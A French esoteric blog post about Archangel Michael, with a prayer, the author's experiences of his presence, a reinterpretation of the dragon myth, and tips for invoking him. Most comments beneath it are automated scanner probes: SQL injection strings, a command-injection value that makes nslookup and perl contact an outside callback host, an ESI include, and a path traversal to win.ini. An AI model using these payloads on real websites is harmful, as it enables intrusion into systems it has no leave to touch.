· 

L'archange Mikael, Force et Lumière

"Archange Michael,

Force de Lumière et d'Amour,

veille sur Moi

Archange Michael,

Montre moi comment utiliser mon bouclier

et à déployer ma force et mes ailes

Archange Michael

apprends moi à manier l'épée de Vérité,

tranchante et dissolvant le Mal,

Archange Michael,

apprend moi à ne plus m'enfuir

Face à moi-même

Archange Michael

Apprends moi à m'aimer comme je t'aime"

 

Quand on parle archanges, en général il arrive en premier.

En l'honneur de sa fête ce week end le 29 septembre, j'ai eu envie de vous raconter ce que je connais de Lui, mon ressenti..

 

Mickaël est le premier à m'être apparu comme à beaucoup d'entre nous.

D'abord des apparitions assez fugaces: dans des moments de peurs, de prières.. Je ressentais sa présence.. Il me semblait très grand, et très lumineux, habillé en guerrier, terrassant les ombres...(j'adore sa petite jupette..^^) comme un garde du corps.

 

Oui, il a cet aspect là, c'est d'ailleurs le plus connu, le chef des armées divines "Qui est comme dieu" lumineux, solaire, terrassant le dragon..

Seulement j'ai appris qu'il ne terrasse pas le dragon.. non.. il remet les "pulsions" à leurs places, en bas vers la terre, pour qu'elles soient transmutées, il remet les choses à leur place.

Mais il travaille AVEC le dragon, il ne le terrasse pas.. Heureusement cette vision maléfique des dragons est en train de changer <3

 

C'est le "mal" qu'il vient aiguillonner de sa lance, de façon à faire se mouvoir les ombres, à les purifier...oui il purifie les courants telluriques. Mais il ne "tue" pas le dragon, symbole de la Vouivre, de l'énergie de la terre..

Bien au contraire, c'est d'ailleurs la rencontre des forces de lumière et de la terre que nait la santé, l'état intérieur juste, équilibré..

Longtemps les dragons ont été diabolisés car symboles des anciennes religions, des cultes voués à la terre Mère, au féminin, à la Nature.

C'est une déformation.. Il tue le menteur, le "méchant" c'est à dire les pulsions égotiques non alignées sur le cœur.(après cela dépend des représentations, certains représentent le combat entre dragon et Mickaël, d'autres entre Mickaël et le diable).

Le diable c'est quoi?

C'est l'ignorance en nous. La non-conscience, la non-reconnaissance. La tentation du pouvoir sur l'autre, la manipulation. Toute pulsion, émotion, souffrance, qui monte à la lumière est aussitôt transformée par Elle, devient conscience et peut alors devenir création, force de Vie.

 

Mickaël peut être très tranchant, nous faisant répondre du tac au tac. Lorsqu’il nous accompagne, les demi-mesures, l'hypocrisie, les faux rapports sociaux nous sont inconfortables.

Il rayonne, il est charmeur mais il est aussi direct: il n'a pas peur du conflit. Il nous aligne.

 

Pour ma part, au début que j'ai conscientisé qu'il était là, plusieurs expériences assez drôles se sont produites. J'ai retrouvé ma langue bien pendue et j'ai cessé d'avoir peur du conflit. Oui j'ai eu envie de prendre ma place, de ne plus accepter de me faire bousculer dans la rue parce que j'étais une femme, par exemple, ou de voir dans les associations où j'étais les gens médire les uns sur les autres et se faire de grands sourires ensuite. La franchise m'a conduite à me retrouver davantage seule, et au début j’étais décontenancée.

Mais ce ne fut qu'un passage dans ma vie. J'ai pris conscience plus tard qu'en réalité accueillir son énergie en moi me permettait  de faire du ménage de façon radicale dans mes relations sociales, pour ne garder que l'essentiel, afin de retrouver, une fois que je serais alignée avec mon "moi" véritable des personnes de cœur. Et ça continue je peux vous le dire!

 

Travailler avec les archanges n'est pas toujours de tout repos. Ils nous aident. Appelez les pour harmoniser un lieu et ils le feront, mais à leur façon. Attendez vous à ce que ça bouge! Ce n'est pas juste une jolie image pieuse et colorée, non. Ils sont de puissants protecteurs et agents de transformation! ça dépote en leur compagnie! Et parfois nos résistances à changer, à lâcher nous font traverser de sombres moments.. Ils sont à nos côtés malgré tout, mais l'épreuve ne s'arrête pas tant que nous ne bougeons pas.

 

Il apporte  la lumière là où il n'y a que les projections, les peurs, les pulsions sans conscience..

Gardien de l'Humanité, il s'assure que les choses de l'En-bas soit vues et transmutées.. qu'elles ne montent pas polluer les niveaux plus élevés.

 

Son énergie est vive, tranchante et douce en même temps.

Quand il intervient spontanément, la lumière est là, pleine, la foi aussi.

La lumière bleue électrique, un éclair bleu, ou une rayon d'or peuvent signifier sa présence.

 

Plus de doute ni de peur. C'est une des figures du masculin sacré à mon sens. Son énergie est davantage de polarité masculine.

 

Seulement, là où je vais vous partager ma vision différente, qui rejoins le livre de Chantel Lysette "Les voies angéliques" et plusieurs autres canal qui échangent avec Mickaël, c'est qu'il est somme toute très jovial, aimant et farceur. Quand on canalise ou que l'on est clair-audient (e), c'est très agréable d'échanger avec lui parce qu'il est drôle, fait des calembours, ou se met parfois à faire des numéros pour nous faire sourire..

Bien au-delà de ce que je pouvais m'attendre avec un archange!

 

C'est un archange très proche des humains. Il aime l'humanité et à foi en Nous.Il a choisi de nous aider à dépasser nos ombres, à les canaliser et à les transmuter: nos ombres sont nos ennemis intérieures, nos peurs etc..

En leur faisant face nous révélons notre divinité.

Son énergie dégage, purifie. Énergie de vérité. Foudre divine. Aigle. (parfois des arc-en-ciel après son passage.. messager divin..)

Il apporte la clarté, la vision. Il ne supporte pas les mensonges. Il recadre, remet à sa place.

 

Je sens sa présence, ou sa vision en archange triomphant dans les moments importants, lorsqu'il a quelque chose à me dire concernant mon évolution spirituelle, mes choix de vie, me prévenir d'un danger ou me transmettre une initiation.

Pour le quotidien, il s'est toujours montré décontracté, à ma grande surprise! Il prent des accents, fait des blagues ou affiche son plus beau sourire du coup c'ést contagieux je ne peux pas rester morose en sa présence bien longtemps.

Il apprécie la musique entraînante,si vous avez besoin de vous secouer appelez Mickaël!

 

Mickaël nous aide à équilibrer le POUVOIR.

Avant d'être prêt(e) à utiliser notre puissance intérieure, nous devons nettoyer, faire le ménage en nous.

Trier, choisir, purifier les karmas et nous confronter à nos peurs.

Il peut aussi nous aider lorsque nous sommes avec des personnes malhonnêtes, à rectifier l'énergie. Vous pouvez l'appeler pour qu'il mette à jour les mensonges. Il demande également que nous soyons honnêtes avant tout avec nous-mêmes.

Mickaël est un de nos alliés lors de cette phase, accompagné de la magnifique dragonne noire.. qui aide à transmuter, et rester ancré à la terre.

Pour équilibrer cette notion de POUVOIR l'humour est essentiel!

Rire de soi, (ce qui est différent de rire des autres ;-) )de la vie, permet de ne pas prendre la grosse tête. Dédramatiser.

Mickaël nous aide à rester en contact avec la VIE, c'est pour cela que nous pouvons, qu'il nous offre la possibilité d’œuvrer avec Lui au quotidien.

Mickaël est aussi très spontané, il aime ce qui est léger, drôle.. pas de prises de tête!

 

Pour faire appel à Lui:

quand vous êtes en découragement, répétez à voix haute: "Mickaël ,donnes moi la force!"

Centrez vous dans le cœur, appelez le. Ne cherchez pas à vaincre ou à combattre: vous renforcez l'ombre en agissant ainsi.

Concentrez vous sur la Lumière. Une étoile ne fait aucun effort pour briller. Elle est simplement.

Concentrez vous sur votre plexus, votre cœur, en répétant son Nom.

 

Pour le célébrer  ( de ce que je sais mais  écoutez votre cœur je suis sûre que ce sera parfait!) les bougies, les couleurs chaudes, la musique qui bouge, les pique nique ou toute sortie en extérieur, les jeux, les moments où nous nous retrouvons tous ensemble.. invitez le chez vous, à passer un bon moment.

OUI vous pouvez aussi les appelez quand tout va bien juste pour partager ce moment avec eux <3 j'adore appeler les archanges avant un repas en famille ou un concert par exemple.. énergie d'amour et de joie assurée!

 

et vous, comment se passent vos échanges avec Lui?

 

Beau week end à toutes et tous <3

 

Laurence/ L'appel de la déesse+ Le chemin de la rose touts droits réservés septembre 2019

Vous pouvez partager ce texte à condition de citer la source et l'auteure

Écrire commentaire

Commentaires: 19
  • #1

    pHqghUme (mardi, 17 août 2021 00:35)

    20

  • #2

    pHqghUme (mardi, 17 août 2021 00:37)

    20

  • #3

    pHqghUme (mardi, 17 août 2021 00:37)

    -1 OR 2+914-914-1=0+0+0+1 --

  • #4

    pHqghUme (mardi, 17 août 2021 00:38)

    20

  • #5

    pHqghUme (mardi, 17 août 2021 00:38)

    (nslookup hitixipfxovdz9d350.bxss.me||perl -e "gethostbyname('hitixipfxovdz9d350.bxss.me')")

  • #6

    -1 OR 2+388-388-1=0+0+0+1 (mardi, 17 août 2021 00:38)

    20

  • #7

    pHqghUme (mardi, 17 août 2021 00:39)

    20

  • #8

    pHqghUme (mardi, 17 août 2021 00:39)

    20

  • #9

    pHqghUme (mardi, 17 août 2021 00:39)

    20<esi:include src="http://bxss.me/rpb.png"/>

  • #10

    pHqghUme (mardi, 17 août 2021 00:39)

    20

  • #11

    pHqghUme (mardi, 17 août 2021 00:39)

    20

  • #12

    ../../../../../../../../../../../../../../windows/win.ini (mardi, 17 août 2021 00:40)

    20

  • #13

    pHqghUme (mardi, 17 août 2021 00:40)

    20

  • #14

    pHqghUme (mardi, 17 août 2021 00:40)

    20

  • #15

    pHqghUme (mardi, 17 août 2021 00:40)

    20

  • #16

    pHqghUme (mardi, 17 août 2021 00:40)

    20

  • #17

    pHqghUme (mardi, 17 août 2021 00:41)

    20

  • #18

    pHqghUme (mardi, 17 août 2021 01:38)

    20

  • #19

    Anne t (vendredi, 29 septembre 2023 07:21)

    Merci merci merci ✨�☀️

Tous droits réservés pour tous pays - Copyright ©'lappeldeladéessedragon Laurence Vian 2019-2023

crédit photos: laurencevian

Contact

Note : veuillez remplir les champs marqués d'un *.